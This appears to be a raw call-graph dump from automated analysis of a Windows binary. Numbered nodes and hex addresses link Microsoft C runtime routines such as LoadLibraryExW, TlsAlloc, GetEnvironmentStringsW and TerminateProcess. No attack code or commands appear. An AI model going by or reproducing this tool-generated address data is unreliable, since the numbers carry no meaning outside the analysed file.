17652 ee1b84 17651->17652 17655 ee1c1d 17651->17655 17652->17649 17652->17650 17653 ee1c85 GetProcAddress 17653->17652 17655->17652 17655->17653 17656 ee1c76 17655->17656 17658 ee1bb1 LoadLibraryExW 17655->17658 17656->17653 17657 ee1c7e FreeLibrary 17656->17657 17657->17653 17659 ee1bc8 GetLastError 17658->17659 17660 ee1bf8 17658->17660 17659->17660 17661 ee1bd3 ___vcrt_InitializeCriticalSectionEx 17659->17661 17660->17655 17661->17660 17662 ee1be9 LoadLibraryExW 17661->17662 17662->17655 17664 ee1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17663->17664 17665 ee1a95 17664->17665 17666 ee1aae TlsAlloc 17665->17666 17667 ed60c0 17665->17667 17667->17641 17668 ee1b2c 17667->17668 17669 ee1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17668->17669 17670 ee1b46 17669->17670 17671 ee1b61 TlsSetValue 17670->17671 17672 ed60d9 17670->17672 17671->17672 17672->17639 17673 ed60e9 17672->17673 17674 ed60f9 17673->17674 17675 ed60f3 17673->17675 17674->17641 17677 ee1ab6 17675->17677 17678 ee1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17677->17678 17679 ee1ad0 17678->17679 17680 ee1ae8 TlsFree 17679->17680 17681 ee1adc 17679->17681 17680->17681 17681->17674 17683 ed971e 17682->17683 17684 ec90ba 17682->17684 17683->17684 17686 ed8e82 17683->17686 17684->17560 17684->17622 17690 ed8e89 17686->17690 17687 ed8ecc GetStdHandle 17687->17690 17688 ed8f2e 17688->17683 17689 ed8edf GetFileType 17689->17690 17690->17687 17690->17688 17690->17689 17692 ed39cf 17691->17692 17693 ed39e5 17691->17693 17692->17693 17697 ed3907 17692->17697 17693->17564 17695 ed39dc 17695->17693 17714 ed3ad4 17695->17714 17698 ed3910 17697->17698 17699 ed3913 17697->17699 17698->17695 17723 ed8f45 17699->17723 17704 ed3924 17750 ed7347 17704->17750 17705 ed3930 17756 ed39f2 17705->17756 17710 ed7347 ___free_lconv_mon 14 API calls 17711 ed3954 17710->17711 17712 ed7347 ___free_lconv_mon 14 API calls 17711->17712 17713 ed395a 17712->17713 17713->17695 17715 ed3b45 17714->17715 17720 ed3ae3 17714->17720 17715->17693 17716 ed8700 __Getctype 14 API calls 17716->17720 17717 ed3b49 17718 ed7347 ___free_lconv_mon 14 API calls 17717->17718 17718->17715 17719 ed7491 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 17719->17720 17720->17715 17720->17716 17720->17717 17720->17719 17722 ed7347 ___free_lconv_mon 14 API calls 17720->17722 18318 ede602 17720->18318 17722->17720 17724 ed8f4e 17723->17724 17725 ed3919 17723->17725 17778 ed768e 17724->17778 17729 ede52b GetEnvironmentStringsW 17725->17729 17730 ed391e 17729->17730 17731 ede543 17729->17731 17730->17704 17730->17705 17732 ed7491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 17731->17732 17733 ede560 17732->17733 17734 ede56a FreeEnvironmentStringsW 17733->17734 17735 ede575 17733->17735 17734->17730 17736 ed7381 __fread_nolock 15 API calls 17735->17736 17737 ede57c 17736->17737 17738 ede595 17737->17738 17739 ede584 17737->17739 17741 ed7491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 17738->17741 17740 ed7347 ___free_lconv_mon 14 API calls 17739->17740 17742 ede589 FreeEnvironmentStringsW 17740->17742 17743 ede5a5 17741->17743 17742->17730 17744 ede5ac 17743->17744 17745 ede5b4 17743->17745 17746 ed7347 ___free_lconv_mon 14 API calls 17744->17746 17747 ed7347 ___free_lconv_mon 14 API calls 17745->17747 17748 ede5b2 FreeEnvironmentStringsW 17746->17748 17747->17748 17748->17730 17751 ed7352 HeapFree 17750->17751 17755 ed392a 17750->17755 17752 ed7367 GetLastError 17751->17752 17751->17755 17753 ed7374 __dosmaperr 17752->17753 17754 ed34c5 __strnicoll 12 API calls 17753->17754 17754->17755 17755->17695 17757 ed3a07 17756->17757 17758 ed8700 __Getctype 14 API calls 17757->17758 17759 ed3a2e 17758->17759 17760 ed3a36 17759->17760 17768 ed3a40 17759->17768 17761 ed7347 ___free_lconv_mon 14 API calls 17760->17761 17777 ed3937 17761->17777 17762 ed3a9d 17763 ed7347 ___free_lconv_mon 14 API calls 17762->17763 17763->17777 17764 ed8700 __Getctype 14 API calls 17764->17768 17765 ed3aac 18308 ed3997 17765->18308 17768->17762 17768->17764 17768->17765 17771 ed3ac7 17768->17771 17773 ed7347 ___free_lconv_mon 14 API calls 17768->17773 18299 ed6fbc 17768->18299 17770 ed7347 ___free_lconv_mon 14 API calls 17772 ed3ab9 17770->17772 18314 ed3bdd IsProcessorFeaturePresent 17771->18314 17775 ed7347 ___free_lconv_mon 14 API calls 17772->17775 17773->17768 17775->17777 17776 ed3ad3 17777->17710 17779 ed7699 17778->17779 17780 ed769f 17778->17780 17825 ed7feb 17779->17825 17800 ed76a5 17780->17800 17830 ed802a 17780->17830 17788 ed76aa 17803 ed9306 17788->17803 17789 ed76e6 17792 ed802a __Getctype 6 API calls 17789->17792 17790 ed76d1 17791 ed802a __Getctype 6 API calls 17790->17791 17793 ed76dd 17791->17793 17794 ed76f2 17792->17794 17797 ed7347 ___free_lconv_mon 14 API calls 17793->17797 17795 ed7705 17794->17795 17796 ed76f6 17794->17796 17842 ed78e4 17795->17842 17798 ed802a __Getctype 6 API calls 17796->17798 17797->17800 17798->17793 17800->17788 17847 ed411a 17800->17847 17802 ed7347 ___free_lconv_mon 14 API calls 17802->17788 17804 ed9330 17803->17804 18120 ed9192 17804->18120 17809 ed9370 18134 ed8f8d 17809->18134 17810 ed9362 17811 ed7347 ___free_lconv_mon 14 API calls 17810->17811 17813 ed9349 17811->17813 17813->17725 17815 ed93a8 17816 ed34c5 __strnicoll 14 API calls 17815->17816 17818 ed93ad 17816->17818 17817 ed93ef 17820 ed9438 17817->17820 18145 ed96c1 17817->18145 17821 ed7347 ___free_lconv_mon 14 API calls 17818->17821 17819 ed93c3 17819->17817 17822 ed7347 ___free_lconv_mon 14 API calls 17819->17822 17824 ed7347 ___free_lconv_mon 14 API calls 17820->17824 17821->17813 17822->17817 17824->17813 17858 ed842d 17825->17858 17828 ed8010 17828->17780 17829 ed8022 TlsGetValue 17831 ed842d std::_Lockit::_Lockit 5 API calls 17830->17831 17832 ed8046 17831->17832 17833 ed8064 TlsSetValue 17832->17833 17834 ed76b9 17832->17834 17834->17800 17835 ed8700 17834->17835 17836 ed870d __Getctype 17835->17836 17837 ed874d 17836->17837 17838 ed8738 RtlAllocateHeap 17836->17838 17873 ed1650 17836->17873 17876 ed34c5 17837->17876 17838->17836 17840 ed76c9 17838->17840 17840->17789 17840->17790 17913 ed7a4a 17842->17913 18015 ed97c5 17847->18015 17850 ed412a 17852 ed4134 IsProcessorFeaturePresent 17850->17852 17853 ed4153 17850->17853 17855 ed4140 17852->17855 17854 ed1334 CallUnexpected 21 API calls 17853->17854 17856 ed415d 17854->17856 18045 ed3c11 17855->18045 17859 ed8007 17858->17859 17860 ed845d 17858->17860 17859->17828 17859->17829 17860->17859 17865 ed8362 17860->17865 17863 ed8477 GetProcAddress 17863->17859 17864 ed8487 std::_Lockit::_Lockit 17863->17864 17864->17859 17871 ed8373 ___vcrt_InitializeCriticalSectionEx 17865->17871 17866 ed8391 LoadLibraryExW 17868 ed83ac GetLastError 17866->17868 17869 ed8410 17866->17869 17867 ed8409 17867->17859 17867->17863 17868->17871 17869->17867 17870 ed8422 FreeLibrary 17869->17870 17870->17867 17871->17866 17871->17867 17872 ed83df LoadLibraryExW 17871->17872 17872->17869 17872->17871 17879 ed168b 17873->17879 17890 ed7724 GetLastError 17876->17890 17878 ed34ca 17878->17840 17880 ed1697 ___scrt_is_nonwritable_in_current_image 17879->17880 17885 ed3ea8 EnterCriticalSection 17880->17885 17882 ed16a2 CallUnexpected 17886 ed16d9 17882->17886 17885->17882 17889 ed3ebf LeaveCriticalSection 17886->17889 17888 ed165b 17888->17836 17889->17888 17891 ed773a 17890->17891 17892 ed7740 17890->17892 17893 ed7feb __Getctype 6 API calls 17891->17893 17894 ed802a __Getctype 6 API calls 17892->17894 17896 ed7744 SetLastError 17892->17896 17893->17892 17895 ed775c 17894->17895 17895->17896 17898 ed8700 __Getctype 12 API calls 17895->17898 17896->17878 17899 ed7771 17898->17899 17900 ed7779 17899->17900 17901 ed778a 17899->17901 17902 ed802a __Getctype 6 API calls 17900->17902 17903 ed802a __Getctype 6 API calls 17901->17903 17905 ed7787 17902->17905 17904 ed7796 17903->17904 17906 ed779a 17904->17906 17907 ed77b1 17904->17907 17910 ed7347 ___free_lconv_mon 12 API calls 17905->17910 17909 ed802a __Getctype 6 API calls 17906->17909 17908 ed78e4 __Getctype 12 API calls 17907->17908 17911 ed77bc 17908->17911 17909->17905 17910->17896 17912 ed7347 ___free_lconv_mon 12 API calls 17911->17912 17912->17896 17914 ed7a56 ___scrt_is_nonwritable_in_current_image 17913->17914 17927 ed3ea8 EnterCriticalSection 17914->17927 17916 ed7a60 17928 ed7a90 17916->17928 17919 ed7a9c 17920 ed7aa8 ___scrt_is_nonwritable_in_current_image 17919->17920 17932 ed3ea8 EnterCriticalSection 17920->17932 17922 ed7ab2 17933 ed7899 17922->17933 17924 ed7aca 17937 ed7aea 17924->17937 17927->17916 17931 ed3ebf LeaveCriticalSection 17928->17931 17930 ed7952 17930->17919 17931->17930 17932->17922 17934 ed78cf __Getctype 17933->17934 17935 ed78a8 __Getctype 17933->17935 17934->17924 17935->17934 17940 edba79 17935->17940 18014 ed3ebf LeaveCriticalSection 17937->18014 17939 ed7710 17939->17802 17941 edbaf9 17940->17941 17945 edba8f 17940->17945 17943 ed7347 ___free_lconv_mon 14 API calls 17941->17943 17967 edbb47 17941->17967 17944 edbb1b 17943->17944 17947 ed7347 ___free_lconv_mon 14 API calls 17944->17947 17945->17941 17946 edbac2 17945->17946 17949 ed7347 ___free_lconv_mon 14 API calls 17945->17949 17948 edbae4 17946->17948 17954 ed7347 ___free_lconv_mon 14 API calls 17946->17954 17950 edbb2e 17947->17950 17951 ed7347 ___free_lconv_mon 14 API calls 17948->17951 17952 edbab7 17949->17952 17953 ed7347 ___free_lconv_mon 14 API calls 17950->17953 17955 edbaee 17951->17955 17968 edaedb 17952->17968 17959 edbb3c 17953->17959 17960 edbad9 17954->17960 17961 ed7347 ___free_lconv_mon 14 API calls 17955->17961 17956 edbbb5 17957 ed7347 ___free_lconv_mon 14 API calls 17956->17957 17962 edbbbb 17957->17962 17964 ed7347 ___free_lconv_mon 14 API calls 17959->17964 17996 edb1f6 17960->17996 17961->17941 17962->17934 17963 edbb55 17963->17956 17966 ed7347 14 API calls ___free_lconv_mon 17963->17966 17964->17967 17966->17963 18008 edbc13 17967->18008 17969 edaeec 17968->17969 17995 edafd5 17968->17995 17970 edaefd 17969->17970 17971 ed7347 ___free_lconv_mon 14 API calls 17969->17971 17972 edaf0f 17970->17972 17973 ed7347 ___free_lconv_mon 14 API calls 17970->17973 17971->17970 17973->17972 17995->17946 17997 edb25b 17996->17997 17998 edb203 17996->17998 17997->17948 17999 edb213 17998->17999 18000 ed7347 ___free_lconv_mon 14 API calls 17998->18000 18001 edb225 17999->18001 18002 ed7347 ___free_lconv_mon 14 API calls 17999->18002 18000->17999 18002->18001 18009 edbc3f 18008->18009 18010 edbc20 18008->18010 18009->17963 18010->18009 18011 edb2da __Getctype 14 API calls 18010->18011 18012 edbc39 18011->18012 18013 ed7347 ___free_lconv_mon 14 API calls 18012->18013 18013->18009 18014->17939 18051 ed9a48 18015->18051 18018 ed97ec 18023 ed97f8 ___scrt_is_nonwritable_in_current_image 18018->18023 18019 ed7724 __dosmaperr 14 API calls 18027 ed9829 CallUnexpected 18019->18027 18020 ed9848 18022 ed34c5 __strnicoll 14 API calls 18020->18022 18021 ed985a CallUnexpected 18024 ed9890 CallUnexpected 18021->18024 18065 ed3ea8 EnterCriticalSection 18021->18065 18025 ed984d 18022->18025 18023->18019 18023->18020 18023->18021 18023->18027 18031 ed99ca 18024->18031 18033 ed98cd 18024->18033 18042 ed98fb 18024->18042 18062 ed3bb0 18025->18062 18027->18020 18027->18021 18029 ed9832 18027->18029 18029->17850 18037 ed99d5 18031->18037 18097 ed3ebf LeaveCriticalSection 18031->18097 18033->18042 18066 ed75d3 GetLastError 18033->18066 18035 ed1334 CallUnexpected 21 API calls 18038 ed99dd 18035->18038 18037->18035 18040 ed75d3 __Getctype 39 API calls 18043 ed9950 18040->18043 18041 ed75d3 __Getctype 39 API calls 18041->18042 18093 ed9976 18042->18093 18043->18029 18044 ed75d3 __Getctype 39 API calls 18043->18044 18044->18029 18046 ed3c2d std::invalid_argument::invalid_argument CallUnexpected 18045->18046 18047 ed3c59 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18046->18047 18048 ed3d2a CallUnexpected 18047->18048 18112 ec8eaa 18048->18112 18050 ed3d48 18050->17853 18052 ed9a54 ___scrt_is_nonwritable_in_current_image 18051->18052 18057 ed3ea8 EnterCriticalSection 18052->18057 18054 ed9a62 18058 ed9aa4 18054->18058 18057->18054 18061 ed3ebf LeaveCriticalSection 18058->18061 18060 ed411f 18060->17850 18060->18018 18061->18060 18098 ed3dff 18062->18098 18064 ed3bbc 18064->18029 18065->18024 18067 ed75e9 18066->18067 18068 ed75ef 18066->18068 18069 ed7feb __Getctype 6 API calls 18067->18069 18070 ed802a __Getctype 6 API calls 18068->18070 18072 ed75f3 SetLastError 18068->18072 18069->18068 18071 ed760b 18070->18071 18071->18072 18074 ed8700 __Getctype 14 API calls 18071->18074 18076 ed7688 18072->18076 18077 ed7683 18072->18077 18075 ed7620 18074->18075 18078 ed7639 18075->18078 18079 ed7628 18075->18079 18080 ed411a CallUnexpected 37 API calls 18076->18080 18077->18041 18082 ed802a __Getctype 6 API calls 18078->18082 18081 ed802a __Getctype 6 API calls 18079->18081 18083 ed768d 18080->18083 18084 ed7636 18081->18084 18085 ed7645 18082->18085 18090 ed7347 ___free_lconv_mon 14 API calls 18084->18090 18086 ed7649 18085->18086 18087 ed7660 18085->18087 18089 ed802a __Getctype 6 API calls 18086->18089 18088 ed78e4 __Getctype 14 API calls 18087->18088 18091 ed766b 18088->18091 18089->18084 18090->18072 18092 ed7347 ___free_lconv_mon 14 API calls 18091->18092 18092->18072 18094 ed997a 18093->18094 18096 ed9942 18093->18096 18111 ed3ebf LeaveCriticalSection 18094->18111 18096->18029 18096->18040 18096->18043 18097->18037 18099 ed3e11 _Fputc 18098->18099 18102 ed3d59 18099->18102 18101 ed3e29 _Fputc 18101->18064 18103 ed3d69 18102->18103 18104 ed3d70 18102->18104 18106 ecf510 _Fputc 16 API calls 18103->18106 18105 ed3d7e 18104->18105 18107 ed3dd6 _Fputc GetLastError SetLastError 18104->18107 18105->18101 18106->18104 18108 ed3da5 18107->18108 18108->18105 18109 ed3bdd __Getctype 11 API calls 18108->18109 18110 ed3dd5 18109->18110 18111->18096 18113 ec8eb2 18112->18113 18114 ec8eb3 IsProcessorFeaturePresent 18112->18114 18113->18050 18116 ecb1aa 18114->18116 18119 ecb290 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18116->18119 18118 ecb28d 18118->18050 18119->18118 18153 ece7da 18120->18153 18123 ed91c5 18125 ed91dc 18123->18125 18126 ed91ca GetACP 18123->18126 18124 ed91b3 GetOEMCP 18124->18125 18125->17813 18127 ed7381 18125->18127 18126->18125 18128 ed73bf 18127->18128 18132 ed738f __Getctype 18127->18132 18130 ed34c5 __strnicoll 14 API calls 18128->18130 18129 ed73aa RtlAllocateHeap 18131 ed73bd 18129->18131 18129->18132 18130->18131 18131->17809 18131->17810 18132->18128 18132->18129 18133 ed1650 std::ios_base::_Init 2 API calls 18132->18133 18133->18132 18135 ed9192 41 API calls 18134->18135 18136 ed8fad 18135->18136 18138 ed8fea IsValidCodePage 18136->18138 18143 ed90b2 18136->18143 18144 ed9005 std::invalid_argument::invalid_argument 18136->18144 18137 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18139 ed9190 18137->18139 18140 ed8ffc 18138->18140 18138->18143 18139->17815 18139->17819 18141 ed9025 GetCPInfo 18140->18141 18140->18144 18141->18143 18141->18144 18143->18137 18193 ed951c 18144->18193 18146 ed96cd ___scrt_is_nonwritable_in_current_image 18145->18146 18273 ed3ea8 EnterCriticalSection 18146->18273 18148 ed96d7 18274 ed945b 18148->18274 18154 ece7f8 18153->18154 18160 ece7f1 18153->18160 18155 ed75d3 __Getctype 39 API calls 18154->18155 18154->18160 18156 ece819 18155->18156 18161 ed7bb6 18156->18161 18160->18123 18160->18124 18162 ed7bc9 18161->18162 18164 ece82f 18161->18164 18162->18164 18169 edbc44 18162->18169 18165 ed7be3 18164->18165 18166 ed7c0b 18165->18166 18167 ed7bf6 18165->18167 18166->18160 18167->18166 18190 ed8f32 18167->18190 18170 edbc50 ___scrt_is_nonwritable_in_current_image 18169->18170 18171 ed75d3 __Getctype 39 API calls 18170->18171 18172 edbc59 18171->18172 18179 edbc9f 18172->18179 18182 ed3ea8 EnterCriticalSection 18172->18182 18174 edbc77 18183 edbcc5 18174->18183 18179->18164 18180 ed411a CallUnexpected 39 API calls 18181 edbcc4 18180->18181 18182->18174 18184 edbc88 18183->18184 18185 edbcd3 __Getctype 18183->18185 18187 edbca4 18184->18187 18185->18184 18186 edba79 __Getctype 14 API calls 18185->18186 18186->18184 18188 ed3ebf std::_Lockit::~_Lockit LeaveCriticalSection 18187->18188 18189 edbc9b 18188->18189 18189->18179 18189->18180 18191 ed75d3 __Getctype 39 API calls 18190->18191 18192 ed8f37 18191->18192 18192->18166 18194 ed9544 GetCPInfo 18193->18194 18195 ed960d 18193->18195 18194->18195 18200 ed955c 18194->18200 18197 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18195->18197 18199 ed96bf 18197->18199 18199->18143 18204 ed89ec 18200->18204 18205 ece7da __strnicoll 39 API calls 18204->18205 18206 ed8a0c 18205->18206 18224 ed73cf 18206->18224 18208 ed8ac8 18211 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18208->18211 18209 ed8ac0 18227 ecbc47 18209->18227 18210 ed8a39 18210->18208 18210->18209 18213 ed7381 __fread_nolock 15 API calls 18210->18213 18215 ed8a5e std::invalid_argument::invalid_argument __alloca_probe_16 18210->18215 18214 ed8aeb 18211->18214 18213->18215 18219 ed8aed 18214->18219 18215->18209 18216 ed73cf __strnicoll MultiByteToWideChar 18215->18216 18217 ed8aa7 18216->18217 18217->18209 18218 ed8aae GetStringTypeW 18217->18218 18218->18209 18220 ece7da __strnicoll 39 API calls 18219->18220 18221 ed8b00 18220->18221 18236 ed8b36 18221->18236 18231 ed73f9 18224->18231 18228 ecbc51 18227->18228 18229 ecbc62 18227->18229 18228->18229 18233 ed4c7a 18228->18233 18229->18208 18232 ed73eb MultiByteToWideChar 18231->18232 18232->18210 18234 ed7347 ___free_lconv_mon 14 API calls 18233->18234 18235 ed4c92 18234->18235 18235->18229 18273->18148 18284 ed4966 18274->18284 18276 ed947d 18277 ed4966 __fread_nolock 29 API calls 18276->18277 18278 ed949c 18277->18278 18279 ed94c3 18278->18279 18280 ed7347 ___free_lconv_mon 14 API calls 18278->18280 18281 ed9702 18279->18281 18280->18279 18298 ed3ebf LeaveCriticalSection 18281->18298 18285 ed4977 18284->18285 18293 ed4973 _Yarn 18284->18293 18286 ed497e 18285->18286 18289 ed4991 std::invalid_argument::invalid_argument 18285->18289 18287 ed34c5 __strnicoll 14 API calls 18286->18287 18288 ed4983 18287->18288 18290 ed3bb0 __strnicoll 29 API calls 18288->18290 18291 ed49bf 18289->18291 18292 ed49c8 18289->18292 18289->18293 18290->18293 18294 ed34c5 __strnicoll 14 API calls 18291->18294 18292->18293 18296 ed34c5 __strnicoll 14 API calls 18292->18296 18293->18276 18295 ed49c4 18294->18295 18297 ed3bb0 __strnicoll 29 API calls 18295->18297 18296->18295 18297->18293 18300 ed6fd8 18299->18300 18301 ed6fca 18299->18301 18302 ed34c5 __strnicoll 14 API calls 18300->18302 18301->18300 18305 ed6ff0 18301->18305 18307 ed6fe0 18302->18307 18303 ed3bb0 __strnicoll 29 API calls 18304 ed6fea 18303->18304 18304->17768 18305->18304 18306 ed34c5 __strnicoll 14 API calls 18305->18306 18306->18307 18307->18303 18309 ed39a4 18308->18309 18313 ed39c1 18308->18313 18310 ed39bb 18309->18310 18312 ed7347 ___free_lconv_mon 14 API calls 18309->18312 18311 ed7347 ___free_lconv_mon 14 API calls 18310->18311 18311->18313 18312->18309 18313->17770 18315 ed3be9 18314->18315 18316 ed3c11 CallUnexpected 8 API calls 18315->18316 18317 ed3bfe GetCurrentProcess TerminateProcess 18316->18317 18317->17776 18319 ede60d 18318->18319 18320 ede61e 18319->18320 18323 ede631 ___from_strstr_to_strchr 18319->18323 18321 ed34c5 __strnicoll 14 API calls 18320->18321 18322 ede623 18321->18322 18322->17720 18324 ede848 18323->18324 18326 ede651 18323->18326 18325 ed34c5 __strnicoll 14 API calls 18324->18325 18327 ede84d 18325->18327 18381 ede86d 18326->18381 18329 ed7347 ___free_lconv_mon 14 API calls 18327->18329 18329->18322 18331 ede697 18333 ed8700 __Getctype 14 API calls 18331->18333 18346 ede681 18331->18346 18334 ede6a5 18333->18334 18338 ed7347 ___free_lconv_mon 14 API calls 18334->18338 18335 ede673 18339 ede67c 18335->18339 18340 ede690 18335->18340 18336 ed7347 ___free_lconv_mon 14 API calls 18336->18322 18342 ede6b0 18338->18342 18343 ed34c5 __strnicoll 14 API calls 18339->18343 18344 ede86d 39 API calls 18340->18344 18341 ede70a 18345 ed7347 ___free_lconv_mon 14 API calls 18341->18345 18342->18346 18347 ede695 18342->18347 18351 ed8700 __Getctype 14 API calls 18342->18351 18343->18346 18344->18347 18353 ede712 18345->18353 18346->18336 18347->18346 18385 ede887 18347->18385 18348 ede755 18348->18346 18349 eddc22 std::ios_base::_Init 32 API calls 18348->18349 18350 ede783 18349->18350 18352 ed7347 ___free_lconv_mon 14 API calls 18350->18352 18354 ede6cc 18351->18354 18359 ede73f 18352->18359 18353->18359 18389 eddc22 18353->18389 18358 ed7347 ___free_lconv_mon 14 API calls 18354->18358 18355 ede83d 18356 ed7347 ___free_lconv_mon 14 API calls 18355->18356 18356->18322 18358->18347 18359->18346 18359->18355 18359->18359 18362 ed8700 __Getctype 14 API calls 18359->18362 18360 ede736 18361 ed7347 ___free_lconv_mon 14 API calls 18360->18361 18361->18359 18363 ede7ce 18362->18363 18364 ede7de 18363->18364 18365 ede7d6 18363->18365 18367 ed6fbc ___std_exception_copy 29 API calls 18364->18367 18366 ed7347 ___free_lconv_mon 14 API calls 18365->18366 18366->18346 18368 ede7ea 18367->18368 18369 ede7f1 18368->18369 18370 ede862 18368->18370 18398 ee549c 18369->18398 18372 ed3bdd __Getctype 11 API calls 18370->18372 18374 ede86c 18372->18374 18375 ede818 18377 ed34c5 __strnicoll 14 API calls 18375->18377 18376 ede837 18378 ed7347 ___free_lconv_mon 14 API calls 18376->18378 18379 ede81d 18377->18379 18378->18355 18380 ed7347 ___free_lconv_mon 14 API calls 18379->18380 18380->18346 18382 ede87a 18381->18382 18383 ede65c 18381->18383 18413 ede8dc 18382->18413 18383->18331 18383->18335 18383->18347 18386 ede6fa 18385->18386 18388 ede89d 18385->18388 18386->18341 18386->18348 18388->18386 18428 ee53ab 18388->18428 18390 eddc2f 18389->18390 18391 eddc4a 18389->18391 18390->18391 18392 eddc3b 18390->18392 18393 eddc59 18391->18393 18528 ee4cb4 18391->18528 18394 ed34c5 __strnicoll 14 API calls 18392->18394 18535 ee1258 18393->18535 18397 eddc40 std::invalid_argument::invalid_argument 18394->18397 18397->18360 18547 ed86c1 18398->18547 18403 ed86c1 39 API calls 18405 ee54ec 18403->18405 18404 ee550f 18406 ed7347 ___free_lconv_mon 14 API calls 18404->18406 18408 ee551b 18404->18408 18409 ece8d4 17 API calls 18405->18409 18406->18408 18407 ede812 18407->18375 18407->18376 18408->18407 18410 ed7347 ___free_lconv_mon 14 API calls 18408->18410 18411 ee54f9 18409->18411 18410->18407 18411->18404 18412 ee5503 SetEnvironmentVariableW 18411->18412 18412->18404 18414 ede8ef 18413->18414 18415 ede8ea 18413->18415 18416 ed8700 __Getctype 14 API calls 18414->18416 18415->18383 18424 ede90c 18416->18424 18417 ede97a 18418 ed411a CallUnexpected 39 API calls 18417->18418 18419 ede97f 18418->18419 18421 ed3bdd __Getctype 11 API calls 18419->18421 18420 ed7347 ___free_lconv_mon 14 API calls 18420->18415 18422 ede98b 18421->18422 18423 ed8700 __Getctype 14 API calls 18423->18424 18424->18417 18424->18419 18424->18423 18425 ed7347 ___free_lconv_mon 14 API calls 18424->18425 18426 ed6fbc ___std_exception_copy 29 API calls 18424->18426 18427 ede969 18424->18427 18425->18424 18426->18424 18427->18420 18429 ee53bf 18428->18429 18430 ee53b9 18428->18430 18446 ee53d4 18429->18446 18433 ee5c7b 18430->18433 18434 ee5c33 18430->18434 18466 ee5c91 18433->18466 18435 ee5c39 18434->18435 18438 ee5c56 18434->18438 18437 ed34c5 __strnicoll 14 API calls 18435->18437 18440 ee5c3e 18437->18440 18442 ed34c5 __strnicoll 14 API calls 18438->18442 18445 ee5c74 18438->18445 18439 ee5c49 18439->18388 18441 ed3bb0 __strnicoll 29 API calls 18440->18441 18441->18439 18443 ee5c65 18442->18443 18444 ed3bb0 __strnicoll 29 API calls 18443->18444 18444->18439 18445->18388 18447 ece7da __strnicoll 39 API calls 18446->18447 18448 ee53ea 18447->18448 18449 ee5406 18448->18449 18450 ee541d 18448->18450 18464 ee53cf 18448->18464 18451 ed34c5 __strnicoll 14 API calls 18449->18451 18453 ee5438 18450->18453 18454 ee5426 18450->18454 18452 ee540b 18451->18452 18457 ed3bb0 __strnicoll 29 API calls 18452->18457 18455 ee5458 18453->18455 18456 ee5445 18453->18456 18458 ed34c5 __strnicoll 14 API calls 18454->18458 18484 ee5d5c 18455->18484 18460 ee5c91 __strnicoll 39 API calls 18456->18460 18457->18464 18459 ee542b 18458->18459 18462 ed3bb0 __strnicoll 29 API calls 18459->18462 18460->18464 18462->18464 18464->18388 18465 ed34c5 __strnicoll 14 API calls 18465->18464 18467 ee5cbb 18466->18467 18468 ee5ca1 18466->18468 18470 ee5cda 18467->18470 18471 ee5cc3 18467->18471 18469 ed34c5 __strnicoll 14 API calls 18468->18469 18472 ee5ca6 18469->18472 18474 ee5cfd 18470->18474 18475 ee5ce6 18470->18475 18473 ed34c5 __strnicoll 14 API calls 18471->18473 18476 ed3bb0 __strnicoll 29 API calls 18472->18476 18477 ee5cc8 18473->18477 18480 ece7da __strnicoll 39 API calls 18474->18480 18483 ee5cb1 18474->18483 18478 ed34c5 __strnicoll 14 API calls 18475->18478 18476->18483 18481 ed3bb0 __strnicoll 29 API calls 18477->18481 18479 ee5ceb 18478->18479 18482 ed3bb0 __strnicoll 29 API calls 18479->18482 18480->18483 18481->18483 18482->18483 18483->18439 18485 ece7da __strnicoll 39 API calls 18484->18485 18486 ee5d6f 18485->18486 18489 ee5da2 18486->18489 18492 ee5dd6 __strnicoll 18489->18492 18490 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18491 ee546e 18490->18491 18491->18464 18491->18465 18493 ee603a 18492->18493 18495 ee5e43 GetCPInfo 18492->18495 18496 ee5e56 18492->18496 18501 ee5e5a 18492->18501 18494 ed73cf __strnicoll MultiByteToWideChar 18498 ee5edc 18494->18498 18495->18496 18495->18501 18496->18494 18496->18501 18497 ee602e 18499 ecbc47 __freea 14 API calls 18497->18499 18498->18497 18500 ed7381 __fread_nolock 15 API calls 18498->18500 18498->18501 18502 ee5f03 __alloca_probe_16 18498->18502 18499->18501 18500->18502 18501->18490 18501->18493 18502->18497 18503 ed73cf __strnicoll MultiByteToWideChar 18502->18503 18504 ee5f4f 18503->18504 18504->18497 18505 ed73cf __strnicoll MultiByteToWideChar 18504->18505 18506 ee5f6b 18505->18506 18506->18497 18507 ee5f79 18506->18507 18508 ee5fdc 18507->18508 18510 ed7381 __fread_nolock 15 API calls 18507->18510 18513 ee5f92 __alloca_probe_16 18507->18513 18509 ecbc47 __freea 14 API calls 18508->18509 18511 ee5fe2 18509->18511 18510->18513 18512 ecbc47 __freea 14 API calls 18511->18512 18512->18501 18513->18508 18514 ed73cf __strnicoll MultiByteToWideChar 18513->18514 18515 ee5fd5 18514->18515 18515->18508 18516 ee5ffe 18515->18516 18522 ed7ebc 18516->18522 18529 ee4cbf 18528->18529 18530 ee4cd4 HeapSize 18528->18530 18531 ed34c5 __strnicoll 14 API calls 18529->18531 18530->18393 18532 ee4cc4 18531->18532 18533 ed3bb0 __strnicoll 29 API calls 18532->18533 18534 ee4ccf 18533->18534 18534->18393 18536 ee1265 18535->18536 18537 ee1270 18535->18537 18539 ed7381 __fread_nolock 15 API calls 18536->18539 18538 ee1278 18537->18538 18545 ee1281 __Getctype 18537->18545 18540 ed7347 ___free_lconv_mon 14 API calls 18538->18540 18543 ee126d 18539->18543 18540->18543 18541 ee12ab HeapReAlloc 18541->18543 18541->18545 18542 ee1286 18544 ed34c5 __strnicoll 14 API calls 18542->18544 18543->18397 18544->18543 18545->18541 18545->18542 18546 ed1650 std::ios_base::_Init 2 API calls 18545->18546 18546->18545 18548 ece7da __strnicoll 39 API calls 18547->18548 18549 ed86d3 18548->18549 18550 ed86e5 18549->18550 18555 ed7e9d 18549->18555 18552 ece8d4 18550->18552 18561 ece92c 18552->18561 18558 ed84b2 18555->18558 18559 ed842d std::_Lockit::_Lockit 5 API calls 18558->18559 18560 ed7ea5 18559->18560 18560->18550 18562 ece93a 18561->18562 18563 ece954 